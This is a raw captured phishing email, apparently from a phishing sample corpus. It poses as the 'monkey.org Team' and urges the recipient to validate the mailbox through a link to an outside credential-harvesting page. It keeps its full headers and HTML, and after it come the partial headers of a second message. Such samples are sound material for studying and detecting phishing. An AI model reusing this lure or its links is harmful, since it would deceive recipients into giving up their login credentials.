From: monkey.org  <admin@somiyabong.com>
To: jose@monkey.org
Subject: NOTIFICATION -Validate Your Mailbox Account jose@monkey.org !!!
Date: 27 Sep 2018 22:22:36 -0700
Message-ID: <20180927222235.371E372141BB6720@somiyabong.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - lbm.lbminfotech.net
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - somiyabong.com
X-Get-Message-Sender-Via: lbm.lbminfotech.net: authenticated_id: sales@visionindustry.co.in
X-Authenticated-Sender: lbm.lbminfotech.net: sales@visionindustry.co.in
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 597

<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3DUTF-8">
<META content=3D"MSHTML 6.00.6001.18000" name=3DGENERATOR></HEAD>
<body>
<table style=3D"FONT-WEIGHT: 400; FONT-SIZE: small; MARGIN: auto auto auto =
45pt; WORD-SPACING: 0px; TEXT-TRANSFORM: none; WIDTH: 702px; COLOR: rgb(34,=
34,34); TEXT-INDENT: 0px; FONT-STYLE: normal; FONT-FAMILY: 'Times New Roman=
'; WHITE-SPACE: normal; LETTER-SPACING: normal; HEIGHT: 498px; font-variant=
-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0=
px; text-decoration-style: initial; text-decoration-color: initial; orphans=
: 2; widows: 2" cellspacing=3D"0" cellpadding=3D"0" width=3D"702" border=3D=
"0">
<TBODY>
<TR>
<td style=3D"BORDER-RIGHT: rgb(149,179,215) 1pt solid; PADDING-RIGHT: 0cm; =
BORDER-TOP: rgb(149,179,215) 1pt solid; PADDING-LEFT: 45pt; BACKGROUND: whi=
te; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: rgb(149,179,215) 1pt sol=
id; WIDTH: 488pt; PADDING-TOP: 0cm; BORDER-BOTTOM: rgb(240,240,240); FONT-F=
AMILY: arial, sans-serif" width=3D"651">
<P style=3D"MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 10.5pt">&nbsp;</P>
<table style=3D"BORDER-RIGHT: medium none; BORDER-TOP: medium none; MARGIN:=
 auto auto auto 307.25pt; BORDER-LEFT: medium none; BORDER-BOTTOM: medium n=
one; BORDER-COLLAPSE: collapse" cellspacing=3D"0" cellpadding=3D"0" border=
=3D"1">
<TBODY>
<TR style=3D"HEIGHT: 19.5pt">
<td style=3D"BORDER-RIGHT: white 1pt solid; PADDING-RIGHT: 5.4pt; BORDER-TO=
P: white 1pt solid; PADDING-LEFT: 5.4pt; PADDING-BOTTOM: 0cm; MARGIN: 0px; =
BORDER-LEFT: white 1pt solid; WIDTH: 92.25pt; PADDING-TOP: 0cm; BORDER-BOTT=
OM: white 1pt solid; FONT-FAMILY: arial, sans-serif; HEIGHT: 19.5pt; BACKGR=
OUND-COLOR: transparent" width=3D"123">
<P style=3D"MARGIN: 0cm 0cm 0pt"><SPAN style=3D"FONT-SIZE: 25.5pt; TEXT-TRA=
NSFORM: capitalize; COLOR: rgb(0,40,81); FONT-FAMILY: 'HP Simplified', sans=
-serif"><STRONG><FONT color=3D#0000ff size=3D3>&nbsp; &nbsp; monkey.org</FO=
NT></STRONG></SPAN></P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN: 0cm 0cm 0pt"><SPAN style=3D"FONT-SIZE: 9pt; COLOR: rgb(=
50,50,50); FONT-FAMILY: Helvetica, sans-serif"></SPAN>&nbsp;</P></TD></TR>
<TR style=3D"HEIGHT: 10.5pt">
<td style=3D"BORDER-RIGHT: rgb(149,179,215) 1pt solid; PADDING-RIGHT: 0cm; =
BORDER-TOP: rgb(240,240,240); PADDING-LEFT: 0cm; BACKGROUND: white; PADDING=
-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: rgb(149,179,215) 1pt solid; WIDTH: =
488pt; PADDING-TOP: 0cm; BORDER-BOTTOM: rgb(240,240,240); FONT-FAMILY: aria=
l, sans-serif; HEIGHT: 10.5pt" width=3D"651">
<P style=3D"MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: normal"><SPAN style=3D"FONT-S=
IZE: 9pt; FONT-FAMILY: Arial, sans-serif"></SPAN></P></TD></TR>
<TR>
<td style=3D"BORDER-RIGHT: rgb(149,179,215) 1pt solid; PADDING-RIGHT: 0cm; =
BORDER-TOP: rgb(240,240,240); PADDING-LEFT: 45pt; BACKGROUND: white; PADDIN=
G-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: rgb(149,179,215) 1pt solid; WIDTH:=
 488pt; PADDING-TOP: 0cm; BORDER-BOTTOM: rgb(240,240,240); FONT-FAMILY: ari=
al, sans-serif" width=3D"651"><SPAN style=3D"FONT-SIZE: 9pt; COLOR: rgb(50,=
50,50); FONT-FAMILY: Helvetica, sans-serif">
<P style=3D"MARGIN: 0cm 0cm 0pt"><SPAN style=3D"FONT-SIZE: 9pt; COLOR: rgb(=
50,50,50); FONT-FAMILY: Helvetica, sans-serif">Hi&nbsp; jose,</SPAN>&nbsp;<=
BR><BR>Our&nbsp;server&nbsp;security&nbsp;is holding (5) incoming messages&=
nbsp;because your email is not yet&nbsp;validate to our newest server&nbsp;=
upgrade .<BR><BR>If you wish to keep using&nbsp;our service, kindly&nbsp;up=
date your email by<SPAN>&nbsp;</SPAN><SPAN>&nbsp;</SPAN>
 <A style=3D"COLOR: rgb(17,85,204)" href=3D"https://hospedandosites.com.br/=
licensed/index.php?email=3D jose@monkey.org" target=3D_blank data-saferedir=
ecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://updatesrcer.ml/=
hme/enx.php?email%3Dsales@amelec-uk.com&amp;source=3Dgmail&amp;ust=3D152619=
0111079000&amp;usg=3DAFQjCNEKjfH8TRKKtsr3ks2ZCL428vfB_w">Signing in here</A=
><SPAN>&nbsp;</SPAN>.&nbsp;&nbsp;<BR><BR>You&nbsp;will not be able to acces=
s your email if Ignored,&nbsp;upgrade takes few&nbsp;seconds .</P>
<P style=3D"MARGIN: 0cm 0cm 0pt">&nbsp;</P>
<P style=3D"MARGIN: 0cm 0cm 0pt"><SPAN style=3D"FONT-SIZE: 9pt; COLOR: rgb(=
50,50,50); FONT-FAMILY: Helvetica, sans-serif"><BR>Thank you,&nbsp;<BR><FON=
T color=3D#0000ff><SPAN style=3D"TEXT-TRANSFORM: capitalize">monkey.org</SP=
AN>&nbsp;Team</FONT></SPAN></P>
<P style=3D"MARGIN: 0cm 0cm 10pt; LINE-HEIGHT: 11.25pt"><SPAN style=3D"FONT=
-SIZE: 9pt; COLOR: rgb(50,50,50); FONT-FAMILY: Helvetica, sans-serif"></SPA=
N>&nbsp;</P></SPAN></TD></TR>
<TR style=3D"HEIGHT: 4pt">
<td style=3D"BORDER-RIGHT: rgb(153,153,153) 1pt solid; PADDING-RIGHT: 0cm; =
BORDER-TOP: rgb(240,240,240); PADDING-LEFT: 0cm; BACKGROUND: white; PADDING=
-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: rgb(153,153,153) 1pt solid; WIDTH: =
488pt; PADDING-TOP: 0cm; BORDER-BOTTOM: rgb(149,179,215) 1pt solid; FONT-FA=
MILY: arial, sans-serif; HEIGHT: 4pt" width=3D"651"></TD></TR>
<TR style=3D"HEIGHT: 111.75pt">
<td style=3D"PADDING-RIGHT: 7.5pt; PADDING-LEFT: 18pt; BORDER-LEFT-COLOR: r=
gb(240,240,240); BACKGROUND: white; BORDER-BOTTOM-COLOR: rgb(240,240,240); =
PADDING-BOTTOM: 0cm; MARGIN: 0px; WIDTH: 488pt; BORDER-TOP-COLOR: rgb(240,2=
40,240); PADDING-TOP: 15pt; FONT-FAMILY: arial, sans-serif; HEIGHT: 111.75p=
t; BORDER-RIGHT-COLOR: rgb(240,240,240)" width=3D"651">
<P style=3D"MARGIN: 0cm 0cm 12pt; LINE-HEIGHT: 8.25pt"><SPAN style=3D"FONT-=
SIZE: 7pt; COLOR: rgb(153,153,153); FONT-FAMILY: Verdana, sans-serif"><FONT=
 color=3D#0000ff>All other trademarks are the property of their respective =
owners.&nbsp; &copy; 2017 Mail Systems Incorporated. All rights reserved.</=
FONT></SPAN></P></TD></TR></TBODY></TABLE><BR class=3DApple-interchange-new=
line></BODY></HTML>

From jose@monkey.org Fri Sep 28 07:37:07 2018 +0000
Return-Path: dthomas@somsd.k12.nj.us
Delivered-To: jose@monkey.org
X-FDA: 74659011294.21.wound07_202d70b437e10
X-Spam-Summary: 75,0,0,b83951a93a7da630,d41d8cd98f00b204,dthomas@somsd.k12.nj.us,,RULES_HIT:10:41:72:355:379:387:474:582:960:962:967:973:978:983:988:989:1021:1029:1152:1189:1190:1208:1221:1256:1260:1261:1263:1313:1314:1345:1381:1431:1436:1516:1517:1518:1535:1543:1559:1575:1588:1589:1592:1594:1691:1711:1714:1719:1730:1749:1777:1792:2525:2527:2528:2538:2559:2564:2682:2685:2859:2895:2900:2902:2917:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3867:3868:3870:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4048:4321:4379:4552:5007:6117:6261:6658:6675:6678:6688:7464:7688:8603:8778:8885:8957:9025:9059:9111:9388:9411:9868:9908:10004:10026:10049:10197:10346:10400:10919:11527:11656:11658:11914:12043:12050:12058:12219:12438:12519:12555:12895:13139:13163:13229:13237:13439:14096:14181:14659:14721:14885:21326:21433:21451:21499:21627:21652:21740:21789:21796:21819:30021:30037:30054:30056:30070:30074:30091,0,RBL:204.8.195.146-irl.urbl.hostedemail.com-127.
X-HE-Tag: wound07_202d70b437e10
X-Filterd-Recvd-Size: 5137
Received: from ssk.somsd.k12.nj.us (ssk.somsd.k12.nj.us [204.8.195.146])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 28 Sep 2018 07:36:58 +0000 (UTC)
Received: from EXCHMB.somsd.org ([10.105.1.167]) by exchCAS.somsd.org
 ([10.105.1.166]) with mapi id 14.03.0415.000; Thu, 27 Sep 2018 14:06:32 -0400
